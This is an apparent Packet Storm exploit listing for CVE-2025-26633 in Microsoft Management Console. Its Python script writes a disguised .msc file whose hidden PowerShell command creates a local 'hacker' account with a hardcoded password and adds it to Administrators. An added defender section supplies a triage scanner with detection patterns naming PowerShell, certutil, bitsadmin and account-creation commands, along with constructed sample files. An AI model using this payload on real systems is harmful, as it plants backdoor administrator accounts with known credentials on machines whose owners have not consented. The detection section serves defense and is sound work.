📄 Microsoft MMC MSC EvilTwin Local Admin Creation

Date: 10 Apr 2026
Reported by: Mohammed Idrees Banyamer
Type: packetstorm
Source: packetstorm.news

Exploit that uses the Microsoft Management Console (mmc.exe) to create a local administrator account via CVE-2025-26633, a security feature bypass in how MMC handles .msc console files that was patched in the March 2025 Patch Tuesday updates. The script writes a .msc file carrying an embedded PowerShell command that adds the user "hacker" to the local Administrators group when the file is opened with mmc.exe. The command runs with the privileges of the user who opens the file; New-LocalUser and Add-LocalGroupMember require administrative rights, so the account is only created when that user already holds them.

Code
#!/usr/bin/env python3
# Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (built-in Windows component - mmc.exe)
# Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025
# Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched)
# CVE: CVE-2025-26633
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# Category: Local
# Platform: Windows
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Note: zero-day at time of disclosure (March 2025), actively exploited by the Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)

# CVE-2025-26633 Proof of Concept – Add Local Administrator Account
# Use ONLY in authorized penetration testing or isolated research labs

import os
import xml.etree.ElementTree as ET

# PAYLOAD: PowerShell one-liner that silently adds the local user "hacker" and puts it in
# the Administrators group. New-LocalUser / Add-LocalGroupMember need administrative rights,
# so the account is only created when the user opening the .msc already has them.
PAYLOAD = (
    'powershell.exe -NoP -W Hidden -C "'
    "$user = 'hacker'; "
    "$pass = ConvertTo-SecureString 'P@ssw0rd123!' -AsPlainText -Force; "
    "New-LocalUser -Name $user -Password $pass -FullName 'Lab User' "
    "-Description 'Research account' -ErrorAction SilentlyContinue; "
    "Add-LocalGroupMember -Group 'Administrators' -Member $user "
    "-ErrorAction SilentlyContinue; "
    "Write-Host '[+] User hacker:P@ssw0rd123! added to Administrators'\""
)


def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
    """Write the console file: .msc files are XML, emitted here as UTF-16 with a declaration."""
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")

    # Display strings shown by the console; chosen to look like the built-in snap-in
    string_table = ET.SubElement(root, "StringTable")
    ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
    ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"

    snapins = ET.SubElement(root, "SnapIns")
    snapin = ET.SubElement(snapins, "SnapIn")

    ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
    ET.SubElement(snapin, "Description").text = "Custom Administration Tool"

    # The embedded command that runs when the console is opened
    actions = ET.SubElement(snapin, "Actions")
    action = ET.SubElement(actions, "Action")
    ET.SubElement(action, "RunCommand").text = PAYLOAD
    ET.SubElement(action, "Name").text = "AddLocalAdmin"

    tree = ET.ElementTree(root)
    tree.write(filename, encoding="utf-16", xml_declaration=True)
    print(f"[+] Malicious .msc file successfully created: {filename}")


def main():
    msc_file = "CVE-2025-26633-AddAdmin.msc"
    create_evil_msc(msc_file)

    print("\n[+] Next step (execute inside vulnerable target or lab VM):")
    print(f"    mmc.exe \"{os.path.abspath(msc_file)}\"\n")
    print("[!] Instant local admin account will be created:")
    print("    Username : hacker")
    print("    Password : P@ssw0rd123!")
    print("    Verify with: net localgroup administrators")


if __name__ == "__main__":
    main()
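Added example for defenders, not part of the packetstorm submission or Banyamer's script: a triage helper that parses .msc console files as XML, flags strings that look like embedded shell commands (powershell.exe, ExecuteShellCommand, New-LocalUser and the like), and flags the EvilTwin layout itself, a .msc placed in an en-US subfolder next to a same-named .msc in the parent folder, which is the MUI path confusion that Trend Micro's public analysis of CVE-2025-26633 describes. The indicator list, the two sample files and the temporary directory layout are constructed for the demonstration; tune the patterns to your environment.

```python
#!/usr/bin/env python3
"""Triage .msc console files for embedded commands and the EvilTwin en-US layout."""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Indicators of an embedded command inside a console file (constructed list, extend as needed).
COMMAND_PATTERNS = [
    re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b", re.I),
    re.compile(r"-(nop|noprofile|w(indowstyle)?\s+hidden|enc(odedcommand)?|ep\s+bypass)\b", re.I),
    re.compile(r"ExecuteShellCommand", re.I),   # MMC's shell-exec method abused by malicious consoles
    re.compile(r"New-LocalUser|Add-LocalGroupMember|net\s+(user|localgroup)", re.I),
]


def iter_strings(root):
    """Yield (location, text) for every non-empty text node and attribute value in the XML."""
    for el in root.iter():
        if el.text and el.text.strip():
            yield el.tag, el.text.strip()
        for key, value in el.attrib.items():
            if value.strip():
                yield f"{el.tag}@{key}", value.strip()


def scan_msc_bytes(data: bytes):
    """Parse the raw file (expat auto-detects the UTF-16 BOM) and return (location, snippet) hits."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [("parse-error", str(exc))]
    findings = []
    for where, text in iter_strings(root):
        if any(pat.search(text) for pat in COMMAND_PATTERNS):
            findings.append((where, text[:120]))
    return findings


def scan_msc_file(path):
    """Scan one .msc on disk; also flag a same-named twin one directory up from an en-US folder."""
    p = Path(path)
    findings = scan_msc_bytes(p.read_bytes())
    if p.parent.name.lower() == "en-us" and (p.parent.parent / p.name).exists():
        findings.append(("eviltwin-layout", f"{p.name} also exists in {p.parent.parent}"))
    return findings


# Constructed samples: minimal XML in the shape of a console file, not real MMC output.
SAMPLE_MALICIOUS = (
    '<MMC_ConsoleFile ConsoleVersion="3.0"><StringTable>'
    '<String ID="1">Local Users and Groups</String>'
    '<String ID="2">powershell.exe -NoP -W Hidden -C "New-LocalUser -Name hacker"</String>'
    "</StringTable></MMC_ConsoleFile>"
).encode("utf-16")
SAMPLE_BENIGN = (
    '<MMC_ConsoleFile ConsoleVersion="3.0"><StringTable>'
    '<String ID="1">Local Users and Groups</String>'
    "</StringTable></MMC_ConsoleFile>"
).encode("utf-16")


def demo():
    """Lay out a clean Tool.msc beside en-US/Tool.msc in a temp dir and scan both."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "en-US").mkdir()
        (base / "Tool.msc").write_bytes(SAMPLE_BENIGN)
        (base / "en-US" / "Tool.msc").write_bytes(SAMPLE_MALICIOUS)
        return {
            "clean": scan_msc_file(base / "Tool.msc"),
            "twin": scan_msc_file(base / "en-US" / "Tool.msc"),
        }


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:]
    if not targets:
        for name, hits in demo().items():
            print(f"{name}: {hits}")
    for target in targets:
        for where, snippet in scan_msc_file(target):
            print(f"{target}: [{where}] {snippet}")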


Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 7
EPSS: 0.45325